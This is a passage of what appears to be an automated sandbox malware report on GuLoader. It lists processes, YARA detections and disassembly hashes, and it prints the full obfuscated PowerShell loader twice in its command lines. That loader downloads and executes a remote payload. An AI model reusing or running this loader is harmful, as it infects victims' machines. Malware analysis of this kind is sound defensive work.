s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
                      Imagebase:0x7ff741d30000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:01:43:47
                      Start date:01/10/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff75da10000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:01:43:58
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
                      Imagebase:0x870000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2356799011.0000000008860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2356962052.0000000009A96000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2333844590.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:01:43:58
                      Start date:01/10/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff75da10000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:14
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:15
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:16
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:17
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:18
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:19
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:20
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:21
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:22
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:23
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:24
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                      Imagebase:0x460000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:25
                      Start time:02:51:12
                      Start date:01/10/2024
                      Path:C:\Windows\SysWOW64\dxdiag.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\syswow64\dxdiag.exe"
                      Imagebase:0x890000
                      File size:222'720 bytes
                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 00007FFAAC47A09A Relevance: 1.8, Strings: 1, Instructions: 548COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6
                        • API String ID: 0-1452363761
                        • Opcode ID: 7d248294db823aa8c035bb5c32bd4d62f742598498e674b7807b11b6dbecd8e2
                        • Instruction ID: c2206ede22db9020b47390bbb6891bb8c6f883f54cfa035923adf65d03fcb113
                        • Opcode Fuzzy Hash: 7d248294db823aa8c035bb5c32bd4d62f742598498e674b7807b11b6dbecd8e2
                        • Instruction Fuzzy Hash: 3B02226290EBC58FF7969B2888592647FE1EF93214F0841FED08DCB193DA199C49C396
                        Function 00007FFAAC3AB276 Relevance: .5, Instructions: 477COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd128b32d55ef3e2ff9e4b6e3b7e1c3e6f9924b784faffecbe4f8c151cfc08ce
                        • Instruction ID: 4bf6bccf8518f49498b77d3d442add3d1f3b67801d562fd248b7912cf5dd5c77
                        • Opcode Fuzzy Hash: bd128b32d55ef3e2ff9e4b6e3b7e1c3e6f9924b784faffecbe4f8c151cfc08ce
                        • Instruction Fuzzy Hash: 36F1B330909A8D8FEBA8DF28C855BE977D1FF55310F44826EE84DC7291CF35A9548B81
                        Function 00007FFAAC3AC022 Relevance: .5, Instructions: 463COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab233182bd250bc523c3261a380949d18fa727d8ecb8b729c381bd1c9fad1bad
                        • Instruction ID: 22057ce35fcde8178f08a967b158a40f4b8bfdfad59b8db066f2258df498dadc
                        • Opcode Fuzzy Hash: ab233182bd250bc523c3261a380949d18fa727d8ecb8b729c381bd1c9fad1bad
                        • Instruction Fuzzy Hash: CAE1C170A08A4D8FEBA8DF28D855BE977D1FF55310F04826EE84DC7291CA39A9548BC1
                        Function 00007FFAAC3AE515 Relevance: 2.6, Strings: 1, Instructions: 1342COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6
                        • API String ID: 0-1452363761
                        • Opcode ID: 3d3b81f847a7705de5b173e4c2634debe8e2647412437e62ba3e0a14577ee3d5
                        • Instruction ID: fb67ce5ef1141574b3636bc5d31d05ce7c9c89c2fcd507c894ccb77ac2973976
                        • Opcode Fuzzy Hash: 3d3b81f847a7705de5b173e4c2634debe8e2647412437e62ba3e0a14577ee3d5
                        • Instruction Fuzzy Hash: 8E62343190DB898FEB49DB5CC4A5EE8BBE0EF56710F1441BAD04DCB292CA25E865C7D0
                        Function 00007FFAAC3A5415 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6
                        • API String ID: 0-1452363761
                        • Opcode ID: 3a8ecc5093eb0ba0c81ad0858e2dcf1e9d5c3f0781ebc9cf35c159f3cbff1984
                        • Instruction ID: 87a4fdf7986e068bafcfc96a87fdf5e9a3504aa3db704fbbfc45756f116cc35f
                        • Opcode Fuzzy Hash: 3a8ecc5093eb0ba0c81ad0858e2dcf1e9d5c3f0781ebc9cf35c159f3cbff1984
                        • Instruction Fuzzy Hash: 4DF1B470A19E498FEF88DF5CC455EA9BBE1FF59300F14416AD40ED72A6CA25E845CBC0
                        Function 00007FFAAC478CE0 Relevance: 1.7, Strings: 1, Instructions: 463COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6
                        • API String ID: 0-1452363761
                        • Opcode ID: c088da4fd66ef7b70948bdb997a7854eb5833f5178c4c902a64835a8f2403a56
                        • Instruction ID: a9de4b748b1e92f065d43827cd7fe4c7e6caa9186e8ecfaca3a3656735bf907f
                        • Opcode Fuzzy Hash: c088da4fd66ef7b70948bdb997a7854eb5833f5178c4c902a64835a8f2403a56
                        • Instruction Fuzzy Hash: 88E16872A0EB958FF39997288859678BBD2EF96214F0841BED04DC71C3DE28DC4983C5
                        Function 00007FFAAC4719AF Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8h
                        • API String ID: 0-2550175997
                        • Opcode ID: 18e4ff91c51cdc64fa481b0415464a38e3e29157ba9f634a7fcb37b3438f490f
                        • Instruction ID: 07b1cc17aadeaac2aec7915b284d74b5e2e4e2f5859ab7223afefd834bff0131
                        • Opcode Fuzzy Hash: 18e4ff91c51cdc64fa481b0415464a38e3e29157ba9f634a7fcb37b3438f490f
                        • Instruction Fuzzy Hash: C5210093A0FBD28FF395977C489A1786FD1DF96614B0844BAD08DC70D3E8188C0E8396
                        Function 00007FFAAC474479 Relevance: .5, Instructions: 548COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab781cadc5cb38d7edbbc2873d230da7a8d70d8268506322b5e588764677079b
                        • Instruction ID: d5ccb48e151c514bbd07fecd99bade884334ce60c311e73906941502d210fbc4
                        • Opcode Fuzzy Hash: ab781cadc5cb38d7edbbc2873d230da7a8d70d8268506322b5e588764677079b
                        • Instruction Fuzzy Hash: 14F12562A0EBD68FF39A976848695747BD0EF53324B0941FAD08DC70E3DD1C9C098B85
                        Function 00007FFAAC47541D Relevance: .4, Instructions: 403COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6406ddf6fbb72a07f73a284274a732aab83ea7ee920a19bc184d185cada9de2c
                        • Instruction ID: fee5765bd91145bc9d920c1c78ec4312cc059e507c4c3d05f239864875460bd5
                        • Opcode Fuzzy Hash: 6406ddf6fbb72a07f73a284274a732aab83ea7ee920a19bc184d185cada9de2c
                        • Instruction Fuzzy Hash: D8C15662A0EB9A8FFB95D76C98195B87BD1EF56224B0841BBD04DCB0D3DE18DC0983C5
                        Function 00007FFAAC479422 Relevance: .4, Instructions: 362COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67bb446c8351c78bf8f2b418639d88b38edf9aa4f921aae44e8401622a5fd926
                        • Instruction ID: ecfdd3312e642f789788267069c95e572358cde1638412ec2d0957b16426ef50
                        • Opcode Fuzzy Hash: 67bb446c8351c78bf8f2b418639d88b38edf9aa4f921aae44e8401622a5fd926
                        • Instruction Fuzzy Hash: D5A14862A0EB998FF7969B6898595B47BE1EF62214B0841FBC04DC7193DD18DC09C3C5
                        Function 00007FFAAC3ABC36 Relevance: .3, Instructions: 333COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
